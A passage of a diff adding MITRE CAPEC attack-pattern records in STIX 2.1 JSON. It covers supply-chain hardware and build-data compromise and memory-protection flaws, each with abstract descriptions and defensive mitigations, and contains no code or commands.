[ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--514cd9bd-12f1-4cf8-9093-4f575517aa3b", + "spec_version": "2.1", + "target_ref": "attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Malware is inserted in a server motherboard (e.g., in the flash memory) in order to alter server functionality from that intended. The development environment or hardware/software support activity environment is susceptible to an adversary inserting malicious software into hardware components during development or update.\n ", + "external_references": [ + { + "external_id": "CAPEC-677", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/677.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Melinda Reed, John F. Miller, Paul Popick, Supply Chain Attack Patterns: Framework and Catalog, 2014--08, Office of the Assistant Secretary of Defense for Research and Engineering", + "external_id": "REF-660", + "source_name": "reference_from_CAPEC", + "url": "https://docplayer.net/13041016-Supply-chain-attack-patterns-framework-and-catalog.html" + }, + { + "description": " Kaspersky Finds Sophisticated UEFI Malware in the Wild , 2020--10---05, ExtremeTech ", + "external_id": "REF-685", + "source_name": "reference_from_CAPEC", + "url": " https://www.extremetech.com/computing/315860-kaspersky-finds-sophisticated-uefi-malware-in-the-wild" + } + ], + "id": "attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Server Motherboard Compromise", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a79f5cc6-781c-4e49-a00e-7aae93718f9e" + ], + "x_capec_consequences": { + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "\n Malware is inserted into the Unified Extensible Firmware Interface (UEFI) software that resides on a flash memory chip soldered to a computer’s motherboard. It is the first thing to turn on when a system is booted and is allowed access to almost every part of the operating system. Hence, the malware will have extensive control over operating system functions and persist after system reboots. [REF-685]\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary with access to hardware/software processes and tools within the development or hardware/software support environment can insert malicious software into hardware components during development or update/maintenance." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Purchase IT systems, components and parts from government approved vendors whenever possible.", + "id": "course-of-action--c1be3529-9fb7-40a8-a6eb-097c4e1a3933", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-677-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cec1097b-0d23-4a54-9ae9-64654e393f3d", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c1be3529-9fb7-40a8-a6eb-097c4e1a3933", + "spec_version": "2.1", + "target_ref": "attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Establish diversity among suppliers.", + "id": "course-of-action--9dd6990e-28bb-4e3f-9efd-11084ccef57d", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-677-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--864c9da9-4c92-4cea-9641-e0a25d17486e", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9dd6990e-28bb-4e3f-9efd-11084ccef57d", + "spec_version": "2.1", + "target_ref": "attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Conduct rigorous threat assessments of suppliers.", + "id": "course-of-action--a3848e81-2458-40d9-b92b-21aed1a69465", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-677-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--956e89e4-8b30-4e89-aed9-b592c0de779b", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a3848e81-2458-40d9-b92b-21aed1a69465", + "spec_version": "2.1", + "target_ref": "attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Require that Bills of Material (BoM) for critical parts and components be certified.", + "id": "course-of-action--19824486-f485-41ff-bdbf-70e7555d7a3b", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-677-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4da5652f-279d-465c-876f-f61e2bd78e19", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--19824486-f485-41ff-bdbf-70e7555d7a3b", + "spec_version": "2.1", + "target_ref": "attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Utilize contract language requiring contractors and subcontractors to flow down to subcontractors and suppliers SCRM and SCRA (Supply Chain Risk Assessment) requirements.", + "id": "course-of-action--9e2b4607-57c1-423b-8b87-1ca72b6669b9", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-677-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d6678ab4-13ee-4393-9302-f1f849c12afd", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9e2b4607-57c1-423b-8b87-1ca72b6669b9", + "spec_version": "2.1", + "target_ref": "attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Establish trusted supplier networks.", + "id": "course-of-action--d8534e9f-4499-45e3-9ae1-85cf37f54f1c", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-677-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9b49a971-d419-4828-b65f-13ac15c90fd6", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d8534e9f-4499-45e3-9ae1-85cf37f54f1c", + "spec_version": "2.1", + "target_ref": "attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n During the system build process, the system is deliberately misconfigured by the alteration of the build data. Access to system configuration data files and build processes is susceptible to deliberate misconfiguration of the system.\n ", + "external_references": [ + { + "external_id": "CAPEC-678", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/678.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Supply Chain", + "external_id": "T1195.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/002" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Melinda Reed, John F. Miller, Paul Popick, Supply Chain Attack Patterns: Framework and Catalog, 2014--08, Office of the Assistant Secretary of Defense for Research and Engineering", + "external_id": "REF-660", + "source_name": "reference_from_CAPEC", + "url": "https://docplayer.net/13041016-Supply-chain-attack-patterns-framework-and-catalog.html" + } + ], + "id": "attack-pattern--d0a5a641-ba5e-4bd6-8a06-addfa4d03cfb", + "modified": "2023-01-24T00:00:00.000Z", + "name": "System Build Data Maliciously Altered", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Modify Data", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n ‘Make’ is a program used for building executable programs and libraries from source code by executing commands and following rules in a ‘makefile’. It can create a malicious executable if commands or dependency paths in the makefile are maliciously altered to execute an unwanted command or reference as a dependency maliciously altered code.\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary has access to the data files and processes used for executing system configuration and performing the build." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement configuration management security practices that protect the integrity of software and associated data.", + "id": "course-of-action--d984401e-2a31-4aab-af29-a41a5cbc9c1c", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-678-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--869d19dd-b471-4f89-b47b-0183ac8dc878", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d984401e-2a31-4aab-af29-a41a5cbc9c1c", + "spec_version": "2.1", + "target_ref": "attack-pattern--d0a5a641-ba5e-4bd6-8a06-addfa4d03cfb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor and control access to the configuration management system.", + "id": "course-of-action--167812bc-7a9b-4800-ae3e-5bb696d54905", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-678-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8a21325b-976e-41b0-b832-ff513fd781d8", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--167812bc-7a9b-4800-ae3e-5bb696d54905", + "spec_version": "2.1", + "target_ref": "attack-pattern--d0a5a641-ba5e-4bd6-8a06-addfa4d03cfb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Harden centralized repositories against attack.", + "id": "course-of-action--d5f02498-2cb3-41af-9a58-79e54dfd1108", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-678-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cb0dbc9b-c7a5-4f9d-982c-b0f25445ecca", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d5f02498-2cb3-41af-9a58-79e54dfd1108", + "spec_version": "2.1", + "target_ref": "attack-pattern--d0a5a641-ba5e-4bd6-8a06-addfa4d03cfb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Establish acceptance criteria for configuration management check-in to assure integrity.", + "id": "course-of-action--177c82cf-28a6-4bec-ad88-7f539639ef51", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-678-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--002a4543-59cc-405d-b6f7-835ee0f6b124", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--177c82cf-28a6-4bec-ad88-7f539639ef51", + "spec_version": "2.1", + "target_ref": "attack-pattern--d0a5a641-ba5e-4bd6-8a06-addfa4d03cfb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Plan for and audit the security of configuration management administration processes.", + "id": "course-of-action--8933af3c-bb36-4306-b04a-c9d575f6ceae", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-678-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0868754c-7cfa-484b-914c-804bad2eccd0", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8933af3c-bb36-4306-b04a-c9d575f6ceae", + "spec_version": "2.1", + "target_ref": "attack-pattern--d0a5a641-ba5e-4bd6-8a06-addfa4d03cfb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Maintain configuration control over operational systems.", + "id": "course-of-action--71fca30c-ceb8-451f-9299-3c9b1b83d9ae", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-678-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--950b2aca-4816-440a-b10e-52af4e8d7a6b", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--71fca30c-ceb8-451f-9299-3c9b1b83d9ae", + "spec_version": "2.1", + "target_ref": "attack-pattern--d0a5a641-ba5e-4bd6-8a06-addfa4d03cfb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary takes advantage of missing or incorrectly configured access control within memory to read/write data or inject malicious code into said memory.\n ", + "external_references": [ + { + "external_id": "CAPEC-679", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/679.html" + }, + { + "external_id": "CWE-1222", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1222.html" + }, + { + "external_id": "CWE-1252", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1252.html" + }, + { + "external_id": "CWE-1257", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1257.html" + }, + { + "external_id": "CWE-1260", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1260.html" + }, + { + "external_id": "CWE-1274", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1274.html" + }, + { + "external_id": "CWE-1282", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1282.html" + }, + { + "external_id": "CWE-1312", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1312.html" + }, + { + "external_id": "CWE-1316", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1316.html" + }, + { + "external_id": "CWE-1326", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1326.html" + }, + { + "description": "Cortex-R4 Manual, ARM", + "external_id": "REF-687", + "source_name": "reference_from_CAPEC", + "url": "https://developer.arm.com/ip-products/processors/cortex-m/cortex-m4" + }, + { + "description": "Testing for NoSQL Injection, The OWASP Foundation", + "external_id": "REF-668", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection" + }, + { + "description": "Memory Protection Unit (MPU), ARM", + "external_id": "REF-689", + "source_name": "reference_from_CAPEC", + "url": "https://static.docs.arm.com/100699/0100/armv8m_architecture_memory_protection_unit_100699_0100_00_en.pdf" + }, + { + "description": "Christopher Domas, The Memory Sinkhole, 2015--07---20", + "external_id": "REF-690", + "source_name": "reference_from_CAPEC", + "url": "https://github.com/xoreaxeaxeax/sinkhole/blob/master/us-15-Domas-TheMemorySinkhole-wp.pdf" + }, + { + "description": "Address Range Memory Mirroring, 2016--07---13, Taku Izumi, Fujitsu Limited", + "external_id": "REF-691", + "source_name": "reference_from_CAPEC", + "url": "https://www.fujitsu.com/jp/documents/products/software/os/linux/catalog/LinuxConJapan2016-Izumi.pdf" + }, + { + "description": "Yuriy Bulygin, Oleksandr Bazhaniuk, Andrew Furtak, John Loucaides, Mikhail Gorobets, BARing the System – New vulnerabilities in Coreboot & UEFI-based Systems, 2017", + "external_id": "REF-692", + "source_name": "reference_from_CAPEC", + "url": "https://www.c7zero.info/stuff/REConBrussels2017_BARing_the_system.pdf" + } + ], + "id": "attack-pattern--3ba20dcc-8fec-4d74-a472-eb9694fe8142", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Exploitation of Improperly Configured or Implemented Memory Protections", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--92cdcd3d-d734-4442-afc3-4599f261498b", + "attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Hardware", + "Hardware" + ], + "x_capec_example_instances": [ + "\n A hardware product contains non-volatile memory, which itself contains boot code that is insufficiently protected. An adversary then modifies this memory to either bypass the secure boot process or to execute their own code.\n ", + "\n A hardware product leverages a CPU that does not possess a memory-protection unit (MPU) and a memory-management unit (MMU) nor a special bit to support write exclusivity, resulting in no write exclusivity. Because of this, an adversary is able to inject malicious code into the memory and later execute it to achieve the desired outcome.\n " + ], + "x_capec_extended_description": "\n Hardware product designs often need to implement memory protection features to prevent users from reading and modifying memory reserved for security operations such as secure booting, authenticating code, device attestation, and more. However, these protection features may be missing if not configured by developers. For example, this can occur if the developers assume these features are configured elsewhere. Additionally, developers often attempt to impose proper protection features, but may incorrectly configure these controls. One such example would be setting controls with insufficient granularity for protected address regions. If an adversary is able to discover improper access controls surrounding memory, it could result in the adversary obtaining sensitive data, executing code, circumventing security mechanisms, escalating privileges, or even denying service to higher privilege software.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Access to the hardware being leveraged." + ], + "x_capec_skills_required": { + "High": "Intricate knowledge of memory structures.", + "Medium": "Ability to craft malicious code to inject into the memory region." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that protected and unprotected memory ranges are isolated and do not overlap.", + "id": "course-of-action--d8644789-b5aa-430b-ba1a-8debdc9b27e0", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-679-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--93b182a2-5d09-46dc-a864-f76e8794dbc0", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d8644789-b5aa-430b-ba1a-8debdc9b27e0", + "spec_version": "2.1", + "target_ref": "attack-pattern--3ba20dcc-8fec-4d74-a472-eb9694fe8142", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If memory regions must overlap, leverage memory priority schemes if memory regions can overlap.", + "id": "course-of-action--e00eb22c-824b-42c4-bbeb-869936a1019e", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-679-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3c6a1cf7-f17e-41e5-a34a-c559ed3bab78", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e00eb22c-824b-42c4-bbeb-869936a1019e", + "spec_version": "2.1", + "target_ref": "attack-pattern--3ba20dcc-8fec-4d74-a472-eb9694fe8142", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that original and mirrored memory regions apply the same protections.", + "id": "course-of-action--a95b7f45-adeb-4411-b4f1-92dec47a8028", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-679-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--40599fe1-c651-4840-8670-ea221031fd9b", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a95b7f45-adeb-4411-b4f1-92dec47a8028", + "spec_version": "2.1", + "target_ref": "attack-pattern--3ba20dcc-8fec-4d74-a472-eb9694fe8142", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure immutable code or data is programmed into ROM or write-once memory.", + "id": "course-of-action--861bcbd5-8263-435d-83cd-98b7a1297980", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-679-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b1b7b572-66d6-497f-9534-70a94507d789", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--861bcbd5-8263-435d-83cd-98b7a1297980", + "spec_version": "2.1", + "target_ref": "attack-pattern--3ba20dcc-8fec-4d74-a472-eb9694fe8142", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Many languages use code signing facilities to vouch for code's identity and to thus tie code to its assigned privileges within an environment. Subverting this mechanism can be instrumental in an attacker escalating privilege. Any means of subverting the way that a virtual machine enforces code signing classifies for this style of attack.", + "external_references": [ + { + "external_id": "CAPEC-68", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/68.html" + }, + { + "external_id": "CWE-325", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/325.html" + }, + { + "external_id": "CWE-328", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/328.html" + }, + { + "external_id": "CWE-1326", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1326.html" + }, + { + "description": "Subvert Trust Controls: Code 